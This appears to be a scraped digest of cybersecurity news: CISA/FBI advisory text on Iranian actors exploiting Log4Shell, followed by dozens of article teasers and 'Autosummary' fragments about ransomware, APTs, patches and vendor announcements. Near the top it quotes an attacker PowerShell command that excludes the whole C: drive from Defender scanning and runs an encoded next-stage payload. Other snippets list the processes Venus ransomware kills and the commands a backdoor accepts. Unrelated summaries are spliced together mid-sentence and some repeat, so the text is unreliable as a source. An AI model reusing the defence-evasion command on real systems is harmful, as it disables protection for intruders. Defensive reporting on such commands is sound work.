CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this CSA to protect against similar malicious cyber activity.
For more information on Iranian government-sponsored Iranian malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threats webpage.
Autosummary:
The actors’ exploit payload ran the following PowerShell command [T1059.001] that added an exclusion tool to Windows Defender [T1562.001]: powershell try{Add-MpPreference -ExclusionPath "C:\"; Write-Host "added-exclusion"} catch {Write-Host "adding-exclusion-failed" }; powershell -enc "$BASE64 encoded payload to download next stage and execute it" The exclusion tool allowlisted the entire c:\drive , enabling threat actors to download tools to the c:\drive without virus scans.It is possible, but was not observed, that the threat actors configured a custom domain, or used other Ngrok tunnel domains, wildcarded here as *.ngrok[.]com , *.ngrok[.]io , ngrok.*.tunnel[.]com , or korgn.*.lennut[.]com .In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. After obtaining initial access and installing XMRig on the VMWare Horizon server, the actors used RDP [T1021.001] and the built-in Windows user account DefaultAccount [T1078.001] to move laterally [TA0008] to a VMware VDI-KMS host.If system, software, or web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in improper locations [M1027]. Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address > The threat actors also changed the password for the local administrator account [T1098] on several hosts as a backup should the rogue domain administrator account get detected and terminated.Detection: Monitor for newly constructed processes and/or command-lines that execute from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows [DS0009] Detection: Monitor for newly constructed scheduled jobs by enabling the Microsoft-Windows-TaskScheduler/Operational setting within the event logging service [DS0003]. CISA and FBI are releasing this Cybersecurity Advisory (CSA) providing the suspected Iranian government-sponsored actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts.Other factors, such as access patterns (ex: multiple systems over a relatively short period of time) and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP [DS0028].Detection: Monitor for newly constructed network connections associated with pings/scans that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement [DS0029]. "Autosummary:
Keep-Alive/Do nothing Stop all DoS attacks and terminate the client Perform a DoS attack Stop all DoS attacks Restart Telnet brute forcing Stop Telnet brute forcing The malware tries to brute force devices using common weak credentials from a hardcoded list, whereas previously, it fetched a list from the C2. "Researchers at cybersecurity firm Rapid7 have identified several vulnerabilities and other potential security issues affecting F5 products. Rapid7 researchers discovered several vulnerabilities in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS. The experts also discovered several bypasses of security controls that the security vendor F5 does not recognize as exploitable vulnerabilities. The […]
The post F5 fixed 2 high-severity Remote Code Execution bugs in its products appeared first on Security Affairs.
"Autosummary:
Below are the bypasses of security controls that F5 rejected because not exploitable: ID1145045 – Local privilege escalation via bad UNIX socket permissions (CWE-269) ID1144093 – SELinux bypass via incorrect file context (CWE-732) ID1144057 – SELinux bypass via command injection in an update script (CWE-78) "The convenience with which you manage all your financial wants and needs may come at a cost
The post Open banking: Tell me what you buy, and I’ll tell you who you are appeared first on WeLiveSecurity
"Autosummary:
The value of our data is something we, as a society, talk about on a daily basis, and we can easily see how mainly big companies acquire services in different areas: health, banking, tech products, marketplaces, all at once. I mostly cook, rather than go to restaurants (but, when I did go to a restaurant, it was clear where and how much I spent), and even that I usually book long-distance bus rides In short, banking data reveals a lot about our lives. Many regulators and lawmakers around the world are beginning or continuing to work on implementing open banking, obliging banks to coordinate information sharing and, as those pushing for these policies believe, to drive innovation, competition, and transparency within the traditionally more conservative banking sector. "The new Phosphorus and Redapt partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the US to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “Enterprises face a growing risk of cyber attacks because of vulnerable IoT and OT endpoints which traditional security companies can’t protect,” said Kal Gajera, Director of North America Channels at Phosphorus. “These attacks can lead to a full compromise … More
The post Phosphorus and Redapt join forces to deliver xIoT security to US enterprises appeared first on Help Net Security.
"Autosummary:
"Immersive Labs announced that the UK Ministry of Defence (MOD) has deployed Immersive Labs Cyber Pro, Crisis Sim, and AppSec solutions to upskill individuals and teams across its organization to confront the latest cyber threats, prove cyber readiness, and identify cybersecurity talent to fill open roles. The integration supports the MOD’s new Digital Skills for Defence programme to build stronger, digital skills across defence and follows a successful trial by the UK Army. The partnership … More
The post Immersive Labs helps UK Ministry of Defence identify qualified candidates to fill vital cybersecurity roles appeared first on Help Net Security.
"Autosummary:
Immersive Labs is trusted by the world’s largest organizations and governments, including Citi, Pfizer, Daimler, Humana, Atos, HSBC, and the UK National Health Service. "Skyworks announced that the company has engaged with MediaTek to offer a complete modem-to-antenna automotive-grade 5G solution. This 5G New Radio Sky5A RF front-end solution will accelerate the deployment of this protocol across an array of automotive OEM and consumer service offerings. “The rollout of 5G is reshaping the automotive market with a variety of safety and entertainment telematics applications to improve the driving experience,” said Martin Lin, deputy general manager of the Wireless Communications … More
The post Skyworks collaborates with MediaTek to offer end-to-end 5G automotive solutions appeared first on Help Net Security.
"Autosummary:
"A critical unauthenticated remote code execution vulnerability in Spotify’s Backstage project has been found and fixed, and developers are advised to take immediate action in their environments. What is Backstage? Having more than 19,000 stars on Github, Backstage is one of the most popular open-source platforms for building developer portals and is in widespread use by Spotify, American Airlines, Netflix, Splunk, Fidelity Investments, Epic Games, Palo Alto Networks and many others. It unifies all infrastructure … More
The post Critical vulnerability in Spotify’s Backstage discovered, patched appeared first on Help Net Security.
"Autosummary:
Having more than 19,000 stars on Github, Backstage is one of the most popular open-source platforms for building developer portals and is in widespread use by Spotify, American Airlines, Netflix, Splunk, Fidelity Investments, Epic Games, Palo Alto Networks and many others. "Recent scientific research into the psychological effects of a ransomware crisis on both organizations and individuals revealed the deep marks that a ransomware crisis leaves on all those affected. It also shows how their IT and security teams can turn into disarray long after the crisis itself has passed. Zerto’s 2022 Ransomware Strategy Survey revealed gaps in companies’ data protection and ransomware strategies that they will want to address to reduce their risk of interrupting … More
The post Creating a holistic ransomware strategy appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Among them are: AdFind Winmail WinRAR Ping Tracert Route NBTscan Certutil Port Scanner These tools help hackers blend with innocuous daily activity, avoid suspicious log traces or raising alarms on security tools, and generally make attribution efforts harder. "Given that 2021 was a record year for new vulnerabilities published and threat actors became better at weaponizing vulnerabilities, timely and well-judged vulnerability prioritization and remediation are a goal all organizations should aspire to achieve. The US Cybersecurity and Infrastructure Security Agency (CISA) regularly publishes lists of the most exploited vulnerabilities and keeps a regularly updated Known Exploited Vulnerabilities catalog everyone is welcome to use, but as helpful as these resources are, organizations usually stumble … More
The post SSVC: Prioritization of vulnerability remediation according to CISA appeared first on Help Net Security.
"Autosummary:
CISA’s decision tree for vulnerability prioritization (Source: CISA) Vulnerabilities are thus categorized into four groups: Track: Not for immediate remediation (just within standard update timelines), but should be tracked for changes in status Not for immediate remediation (just within standard update timelines), but should be tracked for changes in status Track*: Requires closer monitoring for changes. "Autosummary:
This comprises utilities such as WinRAR, Ping, Traceroute, NBTscan, Certutil, in addition to a backdoor capable of downloading arbitrary files, gathering system information, and uploading encrypted data. "A suspected China-linked APT group breached a digital certificate authority in Asia as part of a campaign aimed at government agencies since March 2022. State-sponsored actors compromised a digital certificate authority in a country in Asia as part of a cyber espionage campaign aimed at multiple government agencies in the region, Symantec warns. Symantec attributes […]
The post China-linked APT Billbug breached a certificate authority in Asia appeared first on Security Affairs.
"Autosummary:
“The ability of this actor to compromise multiple victims at once indicates that this threat group remains a skilled and well-resourced operator that is capable of carrying out sustained and wide-ranging campaigns,” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, certificate authority) – Microsoft Windows utility that can be used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. “The targeting of the government victims is most likely driven by espionage motivations, with the certificate authority likely targeted in order to steal legitimate digital certificates, as mentioned in the introduction.” "Autosummary:
While this number isn’t large, Backstage is used by many large firms, including Spotify, Netflix, Epic Games, Jaguar/Land Rover, Mercedes Benz, American Airlines, Splunk, TUI, Oriflame, Twilio, SoundCloud, HBO Max, HP Inc, Siemens, VMware, and IKEA. "Autosummary:
The Venus ransomware attempts to terminate 39 processes associated with database servers and Microsoft office applications: taskkill msftesql.exe sqlagent.exe sqlbrowser.exe sqlservr.exe sqlwriter.exe oracle.exe ocssd.exe dbsnmp.exe synctime.exe mydesktopqos.exe agntsvc.exe isqlplussvc.exe xfssvccon.exe mydesktopservice.exe ocautoupds.exe agntsvc.exe agntsvc.exe agntsvc.exe encsvc.exe firefoxconfig.exe tbirdconfig.exe ocomm.exe mysqld.exe mysqld-nt.exe mysqld-opt.exe dbeng50.exe sqbcoreservice.exe excel.exe infopath.exe msaccess.exe mspub.exe onenote.exe outlook.exe powerpnt.exe sqlservr.exe thebat64.exe thunderbird.exe winword.exe wordpad.exe Initial ransom payments demanded in Venus ransomware attacks appear to currently start around 1 BTC (at initial ransom demands may start around 1 BTC (which presently is worth less than US $17,000.) "Autosummary:
" Credit: European Space Agency On top of that, while critical devices in the network are subjected to thorough vetting, the non-critical counterparts are not only commercial-off-the-shelf (COTS) devices but also lack the same rigorous process, leading to possible avenues for supply chain compromises that could be weaponized to activate the attack by integrating a rogue third-party component into the system. "Autosummary:
"Autosummary:
A wider distribution As Kaspersky explains in a report published today, their telemetry shows DTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey, and the United States. "ThreatX has launched the ThreatX Academy, an online portal hosting an extensive library of cybersecurity training modules. These courses provide an accessible and approachable opportunity for those looking to begin, or advance, their cybersecurity careers. ThreatX is providing all foundational 100-level content at no charge. Training content spans many areas of cybersecurity, including Application Security, Data Protection and Privacy, Networking, Secure DevOps and Wireless Security, among others. The need for cybersecurity professionals has been growing … More
The post ThreatX Academy increases access to cybersecurity expertise appeared first on Help Net Security.
"Autosummary:
Through (ISC)², members can earn several security certifications, including: CISSP Certified in Cybersecurity SSCP – Security Administration CCSP – Cloud Security CSSLP – Software Security In order to maintain these certifications, members must earn Continuing Professional Education (CPE) Credits. "Northwave has conducted scientific research into the psychological fallout of a ransomware crisis on both organizations and individuals. The findings reveal the deep marks that a ransomware crisis leaves on all those affected. It also shows how their IT and security teams can turn into disarray long after the problem has passed. In this Help Net Security video, Inge van der Beijl, Director Behaviour & Resilience at Northwave, talks about the research findings and illustrates … More
The post The psychological fallout of a ransomware crisis appeared first on Help Net Security.
"Autosummary:
"The key trends for the energy industry are about how we manage the future supply and demand challenges at a much more granular level than we are currently able do. If we’re ever to balance the supply and demand equation against the backdrop of increased consumer demands (electric vehicles, mass transport systems, electrification of home heating systems, etc.), and the increased complexity in the generation, distribution and storage systems, this supply and demand will have … More
The post Key cybersecurity trends in the energy sector appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Interestingly, the most targeted country in Q3 2022 was Ethiopia (2.38%), where it is illegal to use and mine cryptocurrencies," the Russian cybersecurity company said. "Russian threat actors employed a new ransomware family called Somnia in attacks against multiple organizations in Ukraine. The Government Computer Emergency Response Team of Ukraine CERT-UA is investigating multiple attacks against organizations in Ukraine that involved a new piece of ransomware called Somnia. Government experts attribute the attacks to the group ‘From Russia with Love’ […]
The post CERT-UA warns of multiple Somnia ransomware attacks against organizations in Ukraine appeared first on Security Affairs.
"Autosummary:
In the second version, the AES algorithm is implemented; at the same time, taking into account the dynamics of the key and the initialization vector, this version of Somnia, according to the attackers’ theoretical plan, does not provide for the possibility of data decryption.” "Are the directors of a company hit by a cyberattack liable for negligence in failing to take steps to limit the risk. As the risk of a cyberattack grows, it is pivotal to consider whether the directors of a company hit by a ransomware attack, for example, can bear any liability for negligence in failing […]
The post Have board directors any liability for a cyberattack against their company? appeared first on Security Affairs.
"Autosummary:
In this context, some of the worst-case scenarios from the perspective of directors’ liability should a cyber attack occur are the following: the actions listed above have been discussed at the board of directors meeting, but no activity has been undertaken; risk analysis actions were undertaken, a weakness in the information systems was identified, but the company did nothing (or very little) to correct them in a timely manner; the company realizes that it has not paid for the renewal of the insurance policy covering the cyber risk, considering it to be remote and assessing the policy to be excessively expensive. The BoD will have to, among others, analyze the corrective actions to be taken to minimize the negative consequences of the cyber attack, assess the economic impact of the attack, including in terms of possible penalties, to possibly inform shareholders and create a budget reserve, and decide whether the incident should be reported to the appropriate authorities and communicated to the individuals whose data was compromised.Also, due to the costs of the pandemic, but in general due to the other overriding priorities, some companies sometimes do not conduct periodic penetration tests and analyses of the state of maturity of technical and organizational measures taken to reduce cyber risk; when these analyses flag weaknesses, they do not immediately handle them but are added to a “to-do-list” without a specific deadline in the short term; and they rely on an incident response plan that has not been tested and, therefore, may not properly function in the event of an attack. The size of the cyber risk to companies cannot be underestimated To indicate the size of the cyber risk to companies, there is, on average, a cyber-attack every 39 seconds, which does not mean that every attack is successful, but that there is an attempt to access companies’ computer systems with that frequency. "The Ukrainian CERT (CERT-UA) has uncovered an attack campaign aimed at compromising Ukrainian organizations and irretrievably encrypting their files. To do that, they are leveraging a specific version of the Somnia ransomware that, “according to the attackers’ theoretical plan, does not provide for the possibility of data decryption.” How the attacks unfolded The Ukrainian cyber experts believe that the attack was effected by Russian hacktivists that go by FRwL (From Russia with Love), with help … More
The post Russian hacktivists hit Ukrainian orgs with ransomware – but no ransom demands appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" What"s for sale On Friday, a user on the "Breached" hacking forums posted a database containing details about 7.2 millionWhoosh customers, including email addresses, phone numbers, and first names. "Offensive Security has partnered with Climb Credit to make professional cybersecurity education more affordable and accessible for individuals through a variety of financing options. There is an ongoing need for cybersecurity experts. According to data from CyberSeek, there are 760,000 cybersecurity job openings in the United States. At the same time, the number of cyberattacks continues to rise at a rate of 32% year over year, according to Check Point Research. A survey from cybersecurity … More
The post Offensive Security partners with Climb Credit to increases access to cybersecurity education appeared first on Help Net Security.
"Autosummary:
“Climb’s mission is to make career-related education affordable, accessible, and inclusive. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Taking cybersecurity investments to the next level In this Help Net Security interview, the former Trident Capital leader offers insight into innovation in the cybersecurity market, M&A activity, pitching to VCs, and more. Microsoft fixes many zero-days under attack November 2022 Patch Tuesday is here, with fixes for many vulnerabilities actively exploited in the wild, including CVE-2022-41091, a Windows Mark … More
The post Week in review: Microsoft fixes many zero-days, malicious droppers on Google Play, IRISSCON 2022 appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: November 11, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Acronis, Flashpoint, ImmuniWeb, Lacework, Picus Security, and Vanta.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Taking cybersecurity investments to the next level In this Help Net Security interview, the former Trident Capital leader offers insight into innovation in the cybersecurity market, M&A activity, pitching to VCs, and more. "The Lockbit 3.0 ransomware gang started leaking the information allegedly stolen from the global high-tech company Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations – big data, artificial intelligence, connectivity, cybersecurity and quantum – to build a future of trust, essential […]
The post Lockbit gang leaked data stolen from global high-tech giant Thales appeared first on Security Affairs.
"Autosummary:
The Group invests in digital and deep tech innovations – big data, artificial intelligence, connectivity, cybersecurity and quantum – to build a future of trust, essential to the development of our societies, by placing people at the heart of decision-making. "Autosummary:
The file types (extensions) targeted by Somnia ransomware are shown below, including documents, images, databases, archives, video files, and more, reflecting the destruction this strain aims to cause. "Experts discovered two new malicious dropper apps on the Google Play Store distributing the Xenomorph banking malware. Zscaler ThreatLabz researchers discovered a couple of malicious dropper apps on the Play Store distributing the Xenomorph banking malware. Xenomorph was first spotted by ThreatFabric researchers in February 2022, at the time the malware was employed in attacks […]
The post Malicious app in the Play Store spotted distributing <a href="hxxps://thehackernews.com/2022/11/these-two-google-play-store-apps.html">Xenomorph Banking Trojan</a> appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Sobeys, the second-largest supermarket chain in Canada, was he victim of a ransomware attack conducted by the Black Basta gang. Sobeys Inc. is the second largest supermarket chain in Canada, the company operates over 1,500 stores operating across Canada under a variety of banners. It is a wholly-owned subsidiary of Empire Company Limited, a Canadian business conglomerate. During […]
The post Canadian supermarket chain giant Sobeys suffered a ransomware attack appeared first on Security Affairs.
"Autosummary:
“Both Quebec’s access to information commission and Alberta’s privacy commission have both been notified by the grocer about a “confidentiality incident.”” reported the website Toronto Star.. source Imgur Images shared by an employee Bleeping Computer first reported that the systems of the company were infected with the Black Basta, the attribution of the attack is based on ransom notes and negotiation chats Bleeping Computer has observed. "Autosummary:
Once you"ve paid, we"ll stop what we were doing, we"ll destroy all data taken from your site, your databases, your mailboxes, and you"ll never hear from us again. The emails appear to be non-targeted, with ransom demand recipients from all verticals, including personal bloggers, government agencies, and large corporations. "Merlin Cyber partners with Titania, helping U.S. government agencies to accurately detect, risk-prioritize, and remediate exploitable misconfigurations in their firewalls, switches, and routers in order to reduce their attack surfaces. Through the partnership, Merlin Cyber’s GEAR Partner Program will help Titania strategically extend its public sector footprint, enabling more agencies to embrace continuous, proactive network security. According to a 2022 market study “The Impact of Exploitable Misconfigurations on the Security of Agencies’ Networks and Current … More
The post Merlin Cyber collaborates with Titania to improve network security for government agencies appeared first on Help Net Security.
"Autosummary:
"As work and personal lives have almost merged into one, threat actors are increasingly targeting people because of their work lives, and cybersecurity needs to adapt to the new reality. In this Help Net Security video, Amir Targighat, CEO at Agency, discusses the rise of employee digital risk. He explores the intersection of personal and enterprise cybersecurity and new approaches for managing the new wave of attacks.
The post Personal cybersecurity is now a company problem appeared first on Help Net Security.
"Autosummary:
"Flashpoint announced a ransomware prediction model that allows vulnerability management teams to improve remediation efforts that could prevent cyber extortion events with VulnDB. According to the U.S. Treasury Department, financial institutions filed $1.2B in ransomware-related costs in 2021, nearly double the amount reported by banks in 2020. In order to help organizations proactively prevent a ransomware attack, Flashpoint’s latest capability enables vulnerability management teams to identify the likelihood that a particular vulnerability could be used … More
The post Flashpoint’s ransomware prediction model enables security teams to remediate vulnerabilities appeared first on Help Net Security.
"Autosummary:
"Ostrich Cyber-Risk debuted the Ostrich Cyber-Risk Birdseye CRQ Simulator designed to define cyber risk in financial values to aid informed business decisions for reducing risk. Security and risk leaders have unprecedented pressures to protect their organization against ongoing threats including ransomware, data breaches and insider threats. Quantifying these risks is necessary to understand, evaluate, prioritize and communicate the risks in financial terms. This lends to improving decision-making, optimizing spending and addressing growing regulatory requirements by … More
The post Ostrich Cyber-Risk Birdseye CRQ Simulator defines cyber risk in financial values appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Microsoft linked Prestige ransomware attacks against organizations in Ukraine and Poland to Russia-linked threat actors. In Mid-October, Microsoft Threat Intelligence Center (MSTIC) researchers uncovered previously undetected ransomware, tracked as Prestige ransomware, employed in attacks targeting organizations in the transportation and related logistics industries in Ukraine and Poland. The Prestige ransomware first appeared in the threat […]
The post Russia-linked IRIDIUM APT linked to Prestige ransomware attacks against Ukraine appeared first on Security Affairs.
"Autosummary:
MSTIC researchers observed threat actors using three methods to deploy the Prestige ransomware: Method 1: The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely create a Windows Scheduled Task on target systems to execute the payload Method 2: The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload Method 3: The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object Microsoft published a list of indicators of compromise (IOCs) and advanced hunting queries detect Prestige ransomware infections. "Autosummary:
In addition, the criminal complaint against Vasiliev says that screenshots of end-to-end encrypted conversations with the Tux username "LockBitSupp" (assumed to be shorthand for "LockBitSupport") were uncovered, which contained multiple discussions related to the ransomware operation and communication with victims. "Autosummary:
"The U.S. DoJ charged a Russian-Canadian national for his alleged role in LockBit ransomware attacks against organizations worldwide. The U.S. Department of Justice (DoJ) charged Mikhail Vasiliev, a dual Russian and Canadian national, for his alleged participation in the LockBit ransomware operation. According to the press release published by DoJ, the man is currently in custody in […]
The post Man charged for role in LockBit ransomware operation appeared first on Security Affairs.
"Autosummary:
“This arrest is the result of over two-and-a-half-years of investigation into the LockBit ransomware group, which has harmed victims in the United States and around the world,” said Deputy Attorney General Lisa O. Monaco. "Autosummary:
Sobeys is one of two national grocery retailers in Canada, with 134,000 employees servicing a network of 1,500 stores in all ten provinces under multiple retail banners, including Sobeys, Safeway, IGA, Foodland, FreshCo, Thrifty Foods, and Lawtons Drugs. "Autosummary:
amari-dash.com control-scorpio.com costa-account.com dash-amari.com dashboard-zim.com dash-egreen.com dash-orient.com dash-satori.com dash-spt.com egreen-dash.com main-sgl.com navois-account.com orient-dash.com satori-dash.com scorpio-control.com spt-dash.com zim-dash.com If you previously visited these websites or had any exchange with their operators, you are advised to report it to the FTC and follow these instructions on what to do next. "Autosummary:
BadBazaar"s retrieved JAR payload (Lookout) BadBazaar"s data-collecting capabilities include the following: Precise location List of installed apps Call logs with geolocation data Contacts list SMS Complete device info WiFi info Phone call recording Take pictures Exfiltrate files or databases Access folders of high-interest (images, IM app logs, chat history, etc.) "Autosummary:
Contributors and those who provided new ransomware information and stories this week include @jorntvdw, @DanielGallagher, @Seifreed, @LawrenceAbrams, @struppigel, @malwareforme, @demonslay335, @Ionut_Ilascu, @fwosar, @FourOctets, @VK_Intel, @malwrhunterteam, @serghei, @PolarToffee, @BleepinComputer, @billtoulas, @LabsSentinel, @vinopaljiri, @_CPResearch_, @ahnlab. "Microsoft on Tuesday released a tightly focused but still significant update that addresses 68 reported (some publicly) vulnerabilities. Unfortunately, this month brings a new record: six zero-day flaws affecting Windows. As a result, we have added both the Windows and Exchange Server updates to our "Patch Now" schedule. Microsoft also published a "defense in depth" advisory (ADV220003) to help secure Office deployments. And there are a small number of Visual Studio, Word, and Excel updates to add to your standard patch release schedule.
Autosummary:
Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms ( ASP.NET Core, .NETYou can find links to all of the Microsoft updates here: CVE-2022-3652, CVE-2022-3653, CVE-2022-3654, CVE-2022-3655, CVE-2022-3656, CVE-2022-3657, CVE-2022-3660, CVE-2022-3661.This month"s update covers the following Windows features: Windows Scripting (the Windows scripting host or object); Networking (particularly how HTTPS is handled); Windows Printing (the print spooler, again); ODBC (the least of our worries this month). Unless otherwise specified, we should assume that each Patch Tuesday update will require testing of core printing functions including: printing from directly connected printers; large print jobs from servers (especially if they are also domain controllers); remote printing (using RDP and VPN). More generally, given the broad nature of this update (Office and Windows), we suggest testing the following Windows features and components: Hyper-V Update: a simple test of starting and stopping VMs and isolated containers will suffice for this minor update. "When in doubt, kick it out, plus other tips for hardening your cyber-defenses against World Cup-themed phishing and other scams
The post FIFA World Cup 2022 scams: Beware of fake lotteries, ticket fraud and other cons appeared first on WeLiveSecurity
"Autosummary:
Your cybersecurity game plan Staying safe from scams, be they World Cup-themed or not, comes down to a few, simple rules: You can’t win a lottery if you didn’t buy a ticket.❌🤔✅ Don’t fall into the trap because of your urge for soccer.#GMsectec #Phishing #Qatar2022 pic.twitter.com/MwnUWjw6ZO — GM Sectec (@gmsectec) September 3, 2022 Rogue websites Sometimes a more convincing (if you don’t pay much attention to detail, that is) variety of phishing fraud involves rogue websites posing as the real ones.To collect your “winnings”, it appears that you only need to fill in a few fields via a form and provide personal details, such as your full name, date of birth, and phone number. "An initial access broker claims to have hacked Deutsche Bank and is offering access to its systems for sale on Telegram. A threat actor (0x_dump) claims to have hacked the multinational investment bank Deutsche Bank and is offering access to its network for sale online. The security researcher Dominic Alvieri was one of the first experts […]
The post An initial access broker claims to have hacked Deutsche Bank appeared first on Security Affairs.
"Autosummary:
“FTP , Shells , root , SQL-inj, DB, Servers.. "Living Security partners with SpyCloud to better identify segments of human risk inside organizations and help security leaders create a proactive plan to mitigate attacks. Living Security’s Unify Human Risk Management Platform now includes SpyCloud’s Identity Risk Engine, which delivers risk assessments and key risk indicators (KRIs) based on analysis of 300+ billion assets recaptured from data breaches and malware victim logs being traded in the criminal underground. The KRIs link email addresses, usernames, passwords, … More
The post Living Security collaborates with SpyCloud to manage and mitigate human cybersecurity risk appeared first on Help Net Security.
"Autosummary:
The KRIs link email addresses, usernames, passwords, and PII across employees’ exposed online personas, giving security teams a fuller picture of individuals’ security hygiene, as well as details on the scope, recency, and severity of their darknet exposures. "Deep Instinct released its 2022 Bi-Annual Cyber Threat Report which focuses on the top malware and ransomware trends and tactics from the first half of 2022 and provides key takeaways and predictions for the ever-evolving cybersecurity threat landscape. “2022 has been another record year for cyber criminals and ransomware gangs. It’s no secret that these threat actors are constantly upping their game with new and improved tactics designed to evade traditional cyber defenses,” said Mark … More
The post How ransomware gangs and malware campaigns are changing appeared first on Help Net Security.
"Autosummary:
Not surprisingly, ransomware attacks remain a serious threat to organizations, as there are currently 17 leaked databases operated by threat actors who are leveraging the data for attacks on third-party companies, most notably social engineering, credential theft, and triple-extortion attacks. "Lacework announced new cloud-native application protection platform (CNAPP) capabilities for the Polygraph Data Platform that provide improved attack path analysis and agentless workload scanning for secrets and vulnerabilities. These capabilities provide better visibility into today’s increasingly complex security environment, enabling organizations to instantly understand what matters so they can triage and respond faster. According to the latest Lacework Cloud Threat Report, attackers are rapidly increasing in sophistication, with a particular focus on infrastructure. Attackers constantly … More
The post Lacework enhances CNAPP capabilities with attack path analysis and agentless vulnerability scanning appeared first on Help Net Security.
"Autosummary:
This enables: A better understanding of the cloud environment and potential risks with an up-to-date inventory of software components and information about vulnerabilities and exposed secrets in the production environment The ability to scan more resources without an agent for more complete coverage of the runtime environment and to stay compliant with security standards and business needs More flexibility and choice to build layered security with continuous monitoring “We take security seriously and always consider it a critical factor when we build or deploy new services, “ says Charly Vitrano, Director of Security Operations at Medallia. "Autosummary:
"Autosummary:
Advice implementation from Cyber Security Awareness Month 2022 The CISA "four things you can do" initiative for the 2022 Cybersecurity Awareness Month, including updating software, thinking before they click to prevent phishing, using strong passwords, and enabling multifactor authentication was publicized aiming to influence end-user behavior toward better security practices.This year, Cybersecurity Awareness Month urged the public, professionals, and industry partners to "see themselves in cyber" in the following ways: The public, by taking action to stay safe online. CISA outlined four "things you can do" to stay safe online for individuals and families, including updating their software, thinking before they click, using strong passwords, and enabling multifactor authentication on sensitive accounts. "A flaw in the ABB Totalflow system used in oil and gas organizations could be exploited by an attacker to inject and execute arbitrary code. Researchers from industrial security firm Claroty disclosed details of a vulnerability affecting ABB Totalflow flow computers and remote controllers. Flow computers are used to calculate volume and flow rates for oil […]
The post A bug in ABB Totalflow flow computers exposed oil and gas companies to attack appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
" Law enforcement agents also seized eight computers and 32 external hard drives, two firearms, and €400,000 worth of cryptocurrency from the suspect"s home, Europol added that this LockBit operator "was one of Europol"s high-value targets due to his involvement in numerous high-profile ransomware cases," and he is known for trying to extort victims with ransom demands between €5 to €70 million. "Autosummary:
"Autosummary:
"Autosummary:
Mark of the Web propagated to files inside an ISO Source: BleepingComputer Two other MoTW bugs fixed In addition to fixing ISO MoTW propagation, the November updates also fixed two MoTW bugs discovered and reported by Will Dormann, a senior vulnerability analyst at ANALYGENCE, with one actively exploited in the wild by threat actors. "Autosummary:
"Autosummary:
"Autosummary:
The commands are stored in encrypted files on the threat actor"s DropBox repository that the malware accesses periodically to retrieve pending actions. Form of DropBox files, TaskType is command Source: Avast The supported commands are the following: Run "cmd /c" with the given parameters Launch an executable with given parameters Download data from DropBox to the device Upload data from the device to DropBox Delete data on the victim"s system Rename data on the victim’s system Exfiltrate file info from a defined directory Set a new directory for the backdoor Exfiltrate system information Update the backdoor’s configuration These functions indicate that Worok is a cyberespionage group interested in stealthy data exfiltration, lateral movement, and spying on the infected device. "Autosummary:
Elon Musk Twitter accounts—both carrying blue ticks (BleepingComputer) And it seems, the process of impersonating prominent figures on Twitter and procuring a blue tick takes under 25 minutes: It took me less than 25 minutes to set up a fake anonymous Apple ID using a VPN and disposable email, attach a masked debit card to it (with the address being Twitter"s HQ), and get a verified account for a prominent figure. Anyone can get a blue tick mark for $8 but not the badge ("profile") such as "Official" or "${country} official government account" or "Musician" etc. "Apple released out-of-band patches for iOS and macOS to fix a couple of code execution vulnerabilities in the libxml2 library. Apple released out-of-band patches for iOS and macOS to address two code execution flaws, tracked as CVE-2022-40303 and CVE-2022-40304, in the libxml2 library for parsing XML documents. The two vulnerabilities were discovered by Google Project […]
The post Apple out-of-band patches fix remote code execution bugs in iOS and macOS appeared first on Security Affairs.
"Autosummary:
"Autosummary:
